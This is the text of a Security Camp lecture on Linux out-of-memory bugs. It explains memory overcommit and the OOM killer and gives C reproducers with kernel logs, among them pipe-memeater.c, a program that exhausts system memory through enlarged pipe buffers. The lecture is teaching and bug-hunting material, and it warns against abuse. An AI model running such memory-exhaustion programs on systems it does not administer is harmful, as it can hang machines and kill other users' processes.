Security Camp national convention 2016   Analysis track 3D

The OOM CTF

2016.8.11


Chapter 0   About this page


The memory management subsystem in the Linux kernel is very optimistic. Therefore, unless resources are appropriately restricted using memory cgroup, it is easy to render a Linux system unusable by depleting system memory via an out of memory (OOM) local DoS attack. Because such a condition can also be formed by chance, without any intention to attack, it is one of the factors that disturb the stable operation of Linux systems, for example as unexplained hangups.

In this lecture, you will learn how to find bugs caused by depletion of memory (bug hunting), look back on the mortal combat over the Linux kernel's memory management subsystem (which started from a vulnerability I found by chance, and is still ongoing), and think about what we should do given the reality that we cannot eradicate bugs caused by depletion of memory.

Expected skills for audiences


0.1 Warnings

Never abuse.

Many sample programs which perform out of memory local DoS attacks are introduced. Do not execute these programs on machines you do not administer.

Even in attack and defense CTF competitions, you might be disqualified for "actions which put excessive stress" on the systems if you execute these programs.

There will be several errors.

I'm not an expert on the memory management subsystem. Also, I have never diligently studied the Linux kernel by reading books. In this lecture, I explain things which I learned from my own experience and which are not explained in technical books.


0.2 Target environments

Reproducer programs are written for the environment below. You may use a virtual environment such as VMware Player.

CPUs             4 (x86_64 architecture)
RAM              1024MB or 2048MB (not a NUMA system)
Swap partitions  none
Hard disk        A disk recognized as /dev/sda
                 (You might fail to reproduce if not recognized as a SCSI device)
CD-ROM           A drive recognized as /dev/sr0
                 (You might fail to reproduce if not recognized as a SCSI device)
Mount tree       Only the / partition, from /dev/sda1, formatted as ext4 or xfs

Please understand that results may differ due to variable factors such as kernel version, system configuration, and timing of execution.


0.3 Self introduction: My relevance with Linux

Security enhancement at OS level

From April 2003 until March 2012, I was involved in the development of an access control module named TOMOYO Linux. We cannot eradicate bugs such as buffer overflow vulnerabilities and OS command injection vulnerabilities, yet when the TOMOYO project started there was only one access control module, SELinux, and it was too cryptic to use.

Regarding war stories of mainlining TOMOYO Linux, please see the lecture text for Security & programming camp 2011 (written in Japanese).

Regarding the history from TOMOYO Linux up to AKARI and CaitSith, please see the lecture text for Security camp 2012.

If you are interested in protection against OS command injection vulnerabilities (e.g. ShellShock), please see the lecture text for Security camp 2015 (written in Japanese).

Troubleshooting Linux systems

From April 2012 until March 2015, I was involved in responding to inquiries about (mainly) RHEL 4 / RHEL 5 / RHEL 6 systems at a support center. Since I had experienced Linux kernel programming through the development of TOMOYO Linux (though, due to the nature of access control modules, only in areas close to userspace), I handled inquiries about problems for which the steps to reproduce or examine them were not yet established, and where we therefore needed to identify what was happening (by writing programs for examination).

It is common to get support requests for examining the cause of unexpected hangups or reboots. But we seldom succeeded in identifying the cause of a hangup because there was no clue in /var/log/messages .

I proposed enabling serial consoles and/or netconsole, expecting that "although we cannot expect messages emitted during a hangup to be recorded in log files, the kernel might have printed something during the hangup". But we did not get any messages as far as I remember. It was a frustrating situation, like encountering unsolvable challenges one after another in a Capture The Flag (CTF) game.


0.4 Introducing main characters?

You can trace the discussions since November 2014 (mainly) in the archive of the linux-mm mailing list.


Chapter 1   Warm-up exercises


1.1 About memory overcommitting

In userspace, memory allocation requests seldom fail. We can ask for more memory than the system has using malloc() etc. because memory overcommitting is permitted by default.

Experiment: Let's try memory overcommitting using realloc().

---------- overcommit.c ----------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        unsigned long size = 0;
        char *buf = NULL;
        while (1) {
                char *cp = realloc(buf, size + 1048576);
                if (!cp)
                        break;
                buf = cp;
                size += 1048576;
        }
        printf("Allocated %lu MB\n", size / 1048576);
        free(buf);
        printf("Freed %lu MB\n", size / 1048576);
        return 0;
}
---------- overcommit.c ----------

Result: We can confirm that memory is overcommitted.

---------- Example output start ----------
[kumaneko@localhost ~]$ cat /proc/meminfo
MemTotal:        1914588 kB
MemFree:         1758600 kB
Buffers:            9044 kB
Cached:            55324 kB
SwapCached:            0 kB
Active:            38408 kB
Inactive:          42832 kB
Active(anon):      17112 kB
Inactive(anon):        4 kB
Active(file):      21296 kB
Inactive(file):    42828 kB
Unevictable:           0 kB
Mlocked:               0 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                64 kB
Writeback:             0 kB
AnonPages:         16888 kB
Mapped:            12552 kB
Shmem:               228 kB
Slab:              36644 kB
SReclaimable:      10984 kB
SUnreclaim:        25660 kB
KernelStack:        3760 kB
PageTables:         2892 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:      957292 kB
Committed_AS:      92500 kB
VmallocTotal:   34359738367 kB
VmallocUsed:      149588 kB
VmallocChunk:   34359581684 kB
HardwareCorrupted:     0 kB
AnonHugePages:      2048 kB
HugePages_Total:       0
HugePages_Free:        0
HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 kB
DirectMap4k:        6144 kB
DirectMap2M:     1042432 kB
DirectMap1G:     1048576 kB
[kumaneko@localhost ~]$ ./overcommit
Allocated 100663295 MB
Freed 100663295 MB
[kumaneko@localhost ~]$ 
---------- Example output end ----------

Thanks to memory overcommitting, we can run many processes.


1.2 About OOM killer

Purpose/Use

A mechanism that tries to keep a Linux system alive by resolving an out of memory (OOM) situation when one occurs.

It reclaims memory by forcibly terminating processes with the SIGKILL signal.

It assumes that memory can always be reclaimed this way, because the SIGKILL signal cannot be ignored.

Risk level 0: We have enough room. (Free memory: above High)
  If there is plenty of free memory, we don't need to reclaim memory.

Risk level 1: We are close to problems. (Free memory: between Low and High)
  When free memory drops to the low: watermark, the kswapd process asynchronously reclaims memory until free memory recovers to the high: watermark. If asynchronous reclaim by kswapd is not sufficient, synchronous reclaim (direct reclaim) is performed by the allocating process.

Risk level 2: OOM situation occurred. (Free memory: reached Min)
  If free memory drops to the min: watermark and nobody can reclaim memory any more, the system is in an OOM situation. If invoking the OOM killer is allowed, the OOM killer reclaims memory by terminating processes with the SIGKILL signal.

Risk level 3: The game is over. (Free memory: depleted)
  If free memory reaches 0, the system will hang up in most cases.

Experiment: Let's invoke OOM killer by using memset() after overcommitting with realloc().

---------- oom.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        unsigned long size = 0;
        char *buf = NULL;
        while (1) {
                char *cp = realloc(buf, size + 1048576);
                if (!cp)
                        break;
                buf = cp;
                size += 1048576;
        }
        printf("Allocated %lu MB\n", size / 1048576);
        memset(buf, 0, size);
        printf("Filled %lu MB\n", size / 1048576);
        free(buf);
        printf("Freed %lu MB\n", size / 1048576);
        return 0;
}
---------- oom.c ----------

Result: We can confirm that the process is forcibly terminated by the SIGKILL signal.

---------- Example output start ----------
[kumaneko@localhost ~]$ ./oom
Allocated 100663295 MB
Killed
[kumaneko@localhost ~]$ dmesg
[  164.825320] oom invoked oom-killer: gfp_mask=0x280da, order=0, oom_adj=0, oom_score_adj=0
[  164.826957] oom cpuset=/ mems_allowed=0
[  164.827789] Pid: 1615, comm: oom Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[  164.829140] Call Trace:
[  164.829593]  [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[  164.830855]  [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[  164.832089]  [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70
[  164.833303]  [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[  164.834402]  [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[  164.835512]  [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[  164.836543]  [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[  164.837692]  [<ffffffff81170a7a>] ? alloc_pages_vma+0x9a/0x150
[  164.838743]  [<ffffffff81152edd>] ? handle_pte_fault+0x73d/0xb20
[  164.839886]  [<ffffffff810537b7>] ? pte_alloc_one+0x37/0x50
[  164.841020]  [<ffffffff8118c559>] ? do_huge_pmd_anonymous_page+0xb9/0x3b0
[  164.842306]  [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0
[  164.843400]  [<ffffffff810663f3>] ? perf_event_task_sched_out+0x33/0x70
[  164.844603]  [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500
[  164.845672]  [<ffffffff8153927e>] ? thread_return+0x4e/0x7d0
[  164.846723]  [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0
[  164.847953]  [<ffffffff8153cc55>] ? page_fault+0x25/0x30
[  164.848914] Mem-Info:
[  164.849339] Node 0 DMA per-cpu:
[  164.849937] CPU    0: hi:    0, btch:   1 usd:   0
[  164.850804] CPU    1: hi:    0, btch:   1 usd:   0
[  164.851781] CPU    2: hi:    0, btch:   1 usd:   0
[  164.852670] CPU    3: hi:    0, btch:   1 usd:   0
[  164.853632] Node 0 DMA32 per-cpu:
[  164.854269] CPU    0: hi:  186, btch:  31 usd:   0
[  164.855133] CPU    1: hi:  186, btch:  31 usd:   0
[  164.856152] CPU    2: hi:  186, btch:  31 usd:   0
[  164.857041] CPU    3: hi:  186, btch:  31 usd:   0
[  164.858033] active_anon:446933 inactive_anon:1 isolated_anon:0
[  164.858034]  active_file:0 inactive_file:14 isolated_file:0
[  164.858034]  unevictable:0 dirty:1 writeback:0 unstable:0
[  164.858034]  free:13259 slab_reclaimable:1902 slab_unreclaimable:6401
[  164.858035]  mapped:9 shmem:57 pagetables:1732 bounce:0
[  164.863169] Node 0 DMA free:8336kB min:332kB low:412kB high:496kB active_anon:7332kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:40kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  164.870125] lowmem_reserve[]: 0 2004 2004 2004
[  164.871060] Node 0 DMA32 free:44700kB min:44720kB low:55900kB high:67080kB active_anon:1780400kB inactive_anon:4kB active_file:0kB inactive_file:56kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:4kB writeback:0kB mapped:36kB shmem:228kB slab_reclaimable:7608kB slab_unreclaimable:25604kB kernel_stack:3776kB pagetables:6888kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:690 all_unreclaimable? yes
[  164.878996] lowmem_reserve[]: 0 0 0 0
[  164.879969] Node 0 DMA: 2*4kB 1*8kB 4*16kB 2*32kB 2*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 1*4096kB = 8336kB
[  164.882265] Node 0 DMA32: 496*4kB 137*8kB 45*16kB 26*32kB 38*64kB 11*128kB 2*256kB 8*512kB 13*1024kB 5*2048kB 2*4096kB = 44824kB
[  164.884786] 99 total pagecache pages
[  164.885462] 0 pages in swap cache
[  164.886100] Swap cache stats: add 0, delete 0, find 0/0
[  164.887027] Free swap  = 0kB
[  164.887677] Total swap = 0kB
[  164.890966] 524272 pages RAM
[  164.891554] 45689 pages reserved
[  164.892198] 460 pages shared
[  164.892760] 459990 pages non-shared
[  164.893400] [ pid ]   uid  tgid total_vm      rss cpu oom_adj oom_score_adj name
[  164.894783] [  485]     0   485     2672      118   3     -17         -1000 udevd
[  164.896319] [ 1139]     0  1139     2280      123   2       0             0 dhclient
[  164.897721] [ 1195]     0  1195     6899       60   2     -17         -1000 auditd
[  164.899068] [ 1217]     0  1217    62272      649   0       0             0 rsyslogd
[  164.900463] [ 1246]    81  1246     5388      107   1       0             0 dbus-daemon
[  164.901944] [ 1259]     0  1259    20705      222   0       0             0 NetworkManager
[  164.903465] [ 1263]     0  1263    14530      124   3       0             0 modem-manager
[  164.905125] [ 1298]    68  1298     9588      292   3       0             0 hald
[  164.906547] [ 1299]     0  1299     5099       54   3       0             0 hald-runner
[  164.908127] [ 1337]     0  1337     5627       47   1       0             0 hald-addon-rfki
[  164.909747] [ 1345]     0  1345     5629       47   0       0             0 hald-addon-inpu
[  164.911254] [ 1346]     0  1346    11247      133   2       0             0 wpa_supplicant
[  164.912993] [ 1351]    68  1351     4501       41   2       0             0 hald-addon-acpi
[  164.914570] [ 1372]     0  1372    16558      177   0     -17         -1000 sshd
[  164.915955] [ 1451]     0  1451    20222      226   2       0             0 master
[  164.917391] [ 1463]    89  1463    20242      217   0       0             0 pickup
[  164.918860] [ 1464]    89  1464    20259      218   1       0             0 qmgr
[  164.920391] [ 1465]     0  1465    29216      152   2       0             0 crond
[  164.921769] [ 1479]     0  1479    17403      127   3       0             0 login
[  164.923171] [ 1480]     0  1480     1020       23   0       0             0 agetty
[  164.924621] [ 1482]     0  1482     1016       21   3       0             0 mingetty
[  164.926043] [ 1484]     0  1484     1016       21   3       0             0 mingetty
[  164.927490] [ 1486]     0  1486     1016       22   3       0             0 mingetty
[  164.928890] [ 1488]     0  1488     1016       20   3       0             0 mingetty
[  164.930313] [ 1490]     0  1490     1016       22   2       0             0 mingetty
[  164.931718] [ 1495]     0  1495     2671      117   1     -17         -1000 udevd
[  164.933090] [ 1496]     0  1496     2671      117   3     -17         -1000 udevd
[  164.934490] [ 1498]     0  1498   521256      370   1       0             0 console-kit-dae
[  164.935999] [ 1565]     0  1565    27075      101   1       0             0 bash
[  164.937387] [ 1580]     0  1580    25629      254   0       0             0 sshd
[  164.938787] [ 1582]   500  1582    25629      252   0       0             0 sshd
[  164.940167] [ 1583]   500  1583    27076       97   0       0             0 bash
[  164.941506] [ 1615]   500  1615 25769820886   442651   2       0             0 oom
[  164.942905] Out of memory: Kill process 1615 (oom) score 926 or sacrifice child
[  164.944495] Killed process 1615, UID 500, (oom) total-vm:103079283544kB, anon-rss:1770600kB, file-rss:4kB
[kumaneko@localhost ~]$
---------- Example output end ----------

It seems that OOM killer is functional, doesn't it?


1.3 About system wide OOM situation and memory cgroup OOM situation

Linux provides cgroup functionality for restricting resource usage, and memory cgroup (one of the cgroup controllers) can restrict memory usage per group of processes. But if memory cgroup is not appropriately configured, a system wide OOM situation will occur after all.

In this lecture, I basically assume only the system wide OOM situation.


1.4 About parameters for users

If I ended here, this would be nothing but a user's guide. In this lecture, I explain the contradictions in the memory management subsystem.


Chapter 2   DoS attack using pipes


2.1 The beginning

One day in July 2013, I noticed a strange patch while running "git bisect" to debug a problem in the development kernel.

  [35f3d14dbbc58447c61e38a162ea10add6b31dc7] pipe: add support for shrinking and growing pipes

"Huh? Allow changing pipe's size? I didn't know such functionality was added."

  ··· I checked the relevant patches, and it turned out that an unprivileged user can grow a pipe's buffer size from 64KB to 1MB.

"What!? Are you sane that you allow anyone to grow pipe's buffer size up to 1MB?"

Experiment: What will happen if all memory is used for pipe buffers?

---------- pipe-memeater.c ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ (1024 + 7) /* F_LINUX_SPECIFIC_BASE + 7 */
#endif

static void child(void)
{
        int fd[2];
        /* Keep creating 1MB pipes until pipe() or fcntl() fails with -1. */
        while (pipe(fd) != -1 &&
               fcntl(fd[1], F_SETPIPE_SZ, 1048576) != -1) {
                int i;
                for (i = 0; i < 256; i++) {
                        static char buf[4096];
                        if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) {
                                printf("write error\n");
                                _exit(1);
                        }
                }
                close(fd[0]);
        }
        pause();
        _exit(0);
}

int main(int argc, char *argv[])
{
        int i;
        close(0);
        for (i = 2; i < 1024; i++)
                close(i);
        for (i = 0; i < 10; i++)
                if (fork() == 0)
                        child();
        return 0;
}
---------- pipe-memeater.c ----------

Result: Almost all processes are killed by the OOM killer.

---------- Example output start ----------
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-NetworkManager(1206)
        |-agetty(1430)
        |-auditd(1142)---{auditd}(1143)
        |-bonobo-activati(1630)---{bonobo-activat}(1631)
        |-console-kit-dae(1440)-+-{console-kit-da}(1441)
        |                       |-{console-kit-da}(1442)
        |                       |-{console-kit-da}(1443)
        |                       |-{console-kit-da}(1444)
        |                       |-{console-kit-da}(1445)
        |                       |-{console-kit-da}(1446)
        |                       |-{console-kit-da}(1447)
        |                       |-{console-kit-da}(1448)
        |                       |-{console-kit-da}(1449)
        |                       |-{console-kit-da}(1450)
        |                       |-{console-kit-da}(1451)
        |                       |-{console-kit-da}(1452)
        |                       |-{console-kit-da}(1453)
        |                       |-{console-kit-da}(1454)
        |                       |-{console-kit-da}(1455)
        |                       |-{console-kit-da}(1456)
        |                       |-{console-kit-da}(1457)
        |                       |-{console-kit-da}(1458)
        |                       |-{console-kit-da}(1459)
        |                       |-{console-kit-da}(1460)
        |                       |-{console-kit-da}(1461)
        |                       |-{console-kit-da}(1462)
        |                       |-{console-kit-da}(1463)
        |                       |-{console-kit-da}(1464)
        |                       |-{console-kit-da}(1465)
        |                       |-{console-kit-da}(1466)
        |                       |-{console-kit-da}(1467)
        |                       |-{console-kit-da}(1468)
        |                       |-{console-kit-da}(1469)
        |                       |-{console-kit-da}(1470)
        |                       |-{console-kit-da}(1471)
        |                       |-{console-kit-da}(1472)
        |                       |-{console-kit-da}(1473)
        |                       |-{console-kit-da}(1474)
        |                       |-{console-kit-da}(1475)
        |                       |-{console-kit-da}(1476)
        |                       |-{console-kit-da}(1477)
        |                       |-{console-kit-da}(1478)
        |                       |-{console-kit-da}(1479)
        |                       |-{console-kit-da}(1480)
        |                       |-{console-kit-da}(1481)
        |                       |-{console-kit-da}(1482)
        |                       |-{console-kit-da}(1483)
        |                       |-{console-kit-da}(1484)
        |                       |-{console-kit-da}(1485)
        |                       |-{console-kit-da}(1486)
        |                       |-{console-kit-da}(1487)
        |                       |-{console-kit-da}(1488)
        |                       |-{console-kit-da}(1489)
        |                       |-{console-kit-da}(1490)
        |                       |-{console-kit-da}(1491)
        |                       |-{console-kit-da}(1492)
        |                       |-{console-kit-da}(1493)
        |                       |-{console-kit-da}(1494)
        |                       |-{console-kit-da}(1495)
        |                       |-{console-kit-da}(1496)
        |                       |-{console-kit-da}(1497)
        |                       |-{console-kit-da}(1498)
        |                       |-{console-kit-da}(1499)
        |                       |-{console-kit-da}(1500)
        |                       |-{console-kit-da}(1501)
        |                       |-{console-kit-da}(1502)
        |                       `-{console-kit-da}(1504)
        |-crond(1408)
        |-dbus-daemon(1601)
        |-dbus-daemon(1193)
        |-dbus-launch(1600)
        |-devkit-power-da(1605)
        |-dhclient(1086)
        |-gconfd-2(1609)
        |-gdm-binary(1567)-+-gdm-simple-slav(1580)-+-Xorg(1583)
        |                  |                       |-gdm-session-wor(1661)
        |                  |                       |-gnome-session(1602)-+-at-spi-registry(1625)
        |                  |                       |                     |-gdm-simple-gree(1641)---{gdm-simple-gre}(1652)
        |                  |                       |                     |-gnome-power-man(1642)
        |                  |                       |                     |-metacity(1638)
        |                  |                       |                     |-polkit-gnome-au(1640)
        |                  |                       |                     `-{gnome-session}(1626)
        |                  |                       `-{gdm-simple-sla}(1584)
        |                  `-{gdm-binary}(1581)
        |-gnome-settings-(1628)---{gnome-settings}(1633)
        |-gvfsd(1637)
        |-hald(1245)-+-hald-runner(1246)-+-hald-addon-acpi(1295)
        |            |                   |-hald-addon-inpu(1293)
        |            |                   `-hald-addon-rfki(1285)
        |            `-{hald}(1247)
        |-login(1424)---bash(1507)
        |-master(1396)-+-pickup(1411)
        |              `-qmgr(1413)
        |-mingetty(1426)
        |-mingetty(1428)
        |-mingetty(1431)
        |-mingetty(1433)
        |-mingetty(1435)
        |-modem-manager(1211)
        |-notification-da(1651)
        |-polkitd(1645)
        |-pulseaudio(1654)---{pulseaudio}(1660)
        |-rsyslogd(1164)-+-{rsyslogd}(1165)
        |                |-{rsyslogd}(1166)
        |                `-{rsyslogd}(1167)
        |-rtkit-daemon(1656)-+-{rtkit-daemon}(1657)
        |                    `-{rtkit-daemon}(1658)
        |-sshd(1317)---sshd(1664)---sshd(1666)---bash(1667)---pstree(1684)
        |-udevd(423)-+-udevd(1437)
        |            `-udevd(1438)
        `-wpa_supplicant(1282)
[kumaneko@localhost ~]$ ./pipe-memeater
(Omitting re-login operation)
[kumaneko@localhost ~]$ dmesg
[  100.086247] pipe-memeater invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0
[  100.087747] pipe-memeater cpuset=/ mems_allowed=0
[  100.088693] Pid: 1687, comm: pipe-memeater Not tainted 2.6.35.14 #1
[  100.089949] Call Trace:
[  100.090640]  [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0
[  100.092080]  [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0
[  100.093106]  [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120
[  100.094226]  [<ffffffff810f9021>] oom_kill_process+0x81/0x180
[  100.095432]  [<ffffffff810f9558>] __out_of_memory+0x58/0xd0
[  100.096745]  [<ffffffff810f9656>] out_of_memory+0x86/0x1b0
[  100.097796]  [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0
[  100.098990]  [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100
[  100.100181]  [<ffffffff8114de87>] pipe_write+0x387/0x670
[  100.101200]  [<ffffffff8114504a>] do_sync_write+0xda/0x120
[  100.102284]  [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230
[  100.103319]  [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230
[  100.104381]  [<ffffffff811cb556>] ? security_file_permission+0x16/0x20
[  100.105659]  [<ffffffff81145328>] vfs_write+0xb8/0x1a0
[  100.106684]  [<ffffffff810ba932>] ? audit_syscall_entry+0x252/0x280
[  100.108022]  [<ffffffff81145cd1>] sys_write+0x51/0x90
[  100.109007]  [<ffffffff8100aff2>] system_call_fastpath+0x16/0x1b
[  100.110197] Mem-Info:
[  100.110644] Node 0 DMA per-cpu:
[  100.111327] CPU    0: hi:    0, btch:   1 usd:   0
[  100.112277] CPU    1: hi:    0, btch:   1 usd:   0
[  100.113140] CPU    2: hi:    0, btch:   1 usd:   0
[  100.114110] CPU    3: hi:    0, btch:   1 usd:   0
[  100.114971] Node 0 DMA32 per-cpu:
[  100.115658] CPU    0: hi:  186, btch:  31 usd:   0
[  100.116654] CPU    1: hi:  186, btch:  31 usd:  32
[  100.117595] CPU    2: hi:  186, btch:  31 usd:   0
[  100.118537] CPU    3: hi:  186, btch:  31 usd:   0
[  100.119483] active_anon:11091 inactive_anon:3641 isolated_anon:0
[  100.119484]  active_file:21 inactive_file:24 isolated_file:0
[  100.119485]  unevictable:0 dirty:21 writeback:0 unstable:0
[  100.119485]  free:3422 slab_reclaimable:4462 slab_unreclaimable:22253
[  100.119485]  mapped:276 shmem:305 pagetables:1864 bounce:0
[  100.125138] Node 0 DMA free:8024kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:100kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  100.132211] lowmem_reserve[]: 0 2004 2004 2004
[  100.133220] Node 0 DMA32 free:5664kB min:5708kB low:7132kB high:8560kB active_anon:44108kB inactive_anon:14820kB active_file:84kB inactive_file:96kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:84kB writeback:0kB mapped:1104kB shmem:1220kB slab_reclaimable:17848kB slab_unreclaimable:88912kB kernel_stack:2008kB pagetables:7456kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:1412 all_unreclaimable? yes
[  100.141024] lowmem_reserve[]: 0 0 0 0
[  100.141879] Node 0 DMA: 1*4kB 2*8kB 0*16kB 2*32kB 2*64kB 1*128kB 2*256kB 2*512kB 2*1024kB 2*2048kB 0*4096kB = 8020kB
[  100.144271] Node 0 DMA32: 676*4kB 7*8kB 0*16kB 0*32kB 1*64kB 1*128kB 0*256kB 0*512kB 1*1024kB 1*2048kB 0*4096kB = 6024kB
[  100.146722] 346 total pagecache pages
[  100.147435] 0 pages in swap cache
[  100.148090] Swap cache stats: add 0, delete 0, find 0/0
[  100.149096] Free swap  = 0kB
[  100.149671] Total swap = 0kB
[  100.152844] 524272 pages RAM
[  100.153432] 13239 pages reserved
[  100.154126] 1067 pages shared
[  100.154695] 488972 pages non-shared
[  100.155379] [ pid ]   uid  tgid total_vm      rss cpu oom_adj name
[  100.156582] [    1]     0     1     4851       75   1       0 init
[  100.157793] [  423]     0   423     2767      200   0     -17 udevd
[  100.158985] [ 1086]     0  1086     2292      122   1       0 dhclient
[  100.160335] [ 1142]     0  1142     6399       49   1     -17 auditd
[  100.161553] [ 1164]     0  1164    60746       96   1       0 rsyslogd
[  100.162787] [ 1193]    81  1193     5471      159   3       0 dbus-daemon
[  100.164070] [ 1206]     0  1206    20717      219   0       0 NetworkManager
[  100.165406] [ 1211]     0  1211    14542      123   1       0 modem-manager
[  100.166709] [ 1245]    68  1245     9089      296   0       0 hald
[  100.167855] [ 1246]     0  1246     5111       56   3       0 hald-runner
[  100.169135] [ 1282]     0  1282    11259      132   3       0 wpa_supplicant
[  100.170476] [ 1285]     0  1285     5639       42   1       0 hald-addon-rfki
[  100.171936] [ 1293]     0  1293     5641       42   0       0 hald-addon-inpu
[  100.173260] [ 1295]    68  1295     4513       40   3       0 hald-addon-acpi
[  100.174622] [ 1317]     0  1317    16570      177   0     -17 sshd
[  100.175790] [ 1396]     0  1396    20234      218   0       0 master
[  100.177024] [ 1408]     0  1408    29216      152   2       0 crond
[  100.178188] [ 1411]    89  1411    20254      217   1       0 pickup
[  100.179389] [ 1413]    89  1413    20271      216   1       0 qmgr
[  100.180571] [ 1424]     0  1424    17415      123   3       0 login
[  100.181737] [ 1426]     0  1426     1028       21   2       0 mingetty
[  100.182983] [ 1428]     0  1428     1028       21   3       0 mingetty
[  100.184222] [ 1430]     0  1430     1032       21   0       0 agetty
[  100.185481] [ 1431]     0  1431     1028       21   1       0 mingetty
[  100.187031] [ 1433]     0  1433     1028       20   1       0 mingetty
[  100.188345] [ 1435]     0  1435     1028       21   2       0 mingetty
[  100.189638] [ 1437]     0  1437     2683      116   3     -17 udevd
[  100.190865] [ 1438]     0  1438     2683      116   2     -17 udevd
[  100.192152] [ 1440]     0  1440   520756      243   3       0 console-kit-dae
[  100.193565] [ 1507]     0  1507    27088       95   1       0 bash
[  100.194796] [ 1567]     0  1567    33001       79   1       0 gdm-binary
[  100.196134] [ 1580]     0  1580    40656      150   3       0 gdm-simple-slav
[  100.197543] [ 1583]     0  1583    42848     4384   2       0 Xorg
[  100.198911] [ 1600]    42  1600     5021       55   1       0 dbus-launch
[  100.200288] [ 1601]    42  1601     5402       79   3       0 dbus-daemon
[  100.201579] [ 1602]    42  1602    66762      476   3       0 gnome-session
[  100.202944] [ 1605]     0  1605    12502      161   3       0 devkit-power-da
[  100.204322] [ 1609]    42  1609    33068      538   0       0 gconfd-2
[  100.205580] [ 1625]    42  1625    30187      283   0       0 at-spi-registry
[  100.206961] [ 1628]    42  1628    86331      943   0       0 gnome-settings-
[  100.208318] [ 1630]    42  1630    88624      186   1       0 bonobo-activati
[  100.210025] [ 1637]    42  1637    33831       76   2       0 gvfsd
[  100.211269] [ 1638]    42  1638    71465      679   0       0 metacity
[  100.212521] [ 1640]    42  1640    62088      437   3       0 polkit-gnome-au
[  100.213886] [ 1641]    42  1641    94596     1210   2       0 gdm-simple-gree
[  100.215265] [ 1642]    42  1642    68437      516   2       0 gnome-power-man
[  100.216677] [ 1645]     0  1645    13169      304   1       0 polkitd
[  100.217893] [ 1654]    42  1654    85934      194   1       0 pulseaudio
[  100.220379] [ 1656]   498  1656    41101       45   2       0 rtkit-daemon
[  100.221717] [ 1661]     0  1661    35453       91   1       0 gdm-session-wor
[  100.223103] [ 1664]     0  1664    25640      254   0       0 sshd
[  100.224290] [ 1666]   500  1666    25640      252   0       0 sshd
[  100.225575] [ 1667]   500  1667    27088       92   3       0 bash
[  100.226844] [ 1686]   500  1686      993       18   0       0 pipe-memeater
[  100.228117] [ 1687]   500  1687      993       18   3       0 pipe-memeater
[  100.229486] [ 1688]   500  1688      993       18   1       0 pipe-memeater
[  100.230815] [ 1689]   500  1689      993       18   0       0 pipe-memeater
[  100.232127] [ 1690]   500  1690      993       18   2       0 pipe-memeater
[  100.233439] [ 1691]   500  1691      993       18   0       0 pipe-memeater
[  100.234773] [ 1692]   500  1692      993       18   1       0 pipe-memeater
[  100.236084] [ 1693]   500  1693      993       18   0       0 pipe-memeater
[  100.237375] [ 1694]   500  1694      993       18   2       0 pipe-memeater
[  100.238727] [ 1695]   500  1695      993       18   0       0 pipe-memeater
[  100.240035] Out of memory: kill process 1602 (gnome-session) score 230152 or a child
[  100.241502] Killed process 1625 (at-spi-registry) vsz:120748kB, anon-rss:1132kB, file-rss:0kB
(Omitting repetitions)
[  117.042248] pipe-memeater invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0
[  117.047397] pipe-memeater cpuset=/ mems_allowed=0
[  117.050821] Pid: 1695, comm: pipe-memeater Not tainted 2.6.35.14 #1
[  117.055079] Call Trace:
[  117.056842]  [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0
[  117.061573]  [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0
[  117.065216]  [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120
[  117.069040]  [<ffffffff810f9021>] oom_kill_process+0x81/0x180
[  117.072962]  [<ffffffff810f9558>] __out_of_memory+0x58/0xd0
[  117.076774]  [<ffffffff810f9656>] out_of_memory+0x86/0x1b0
[  117.080130]  [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0
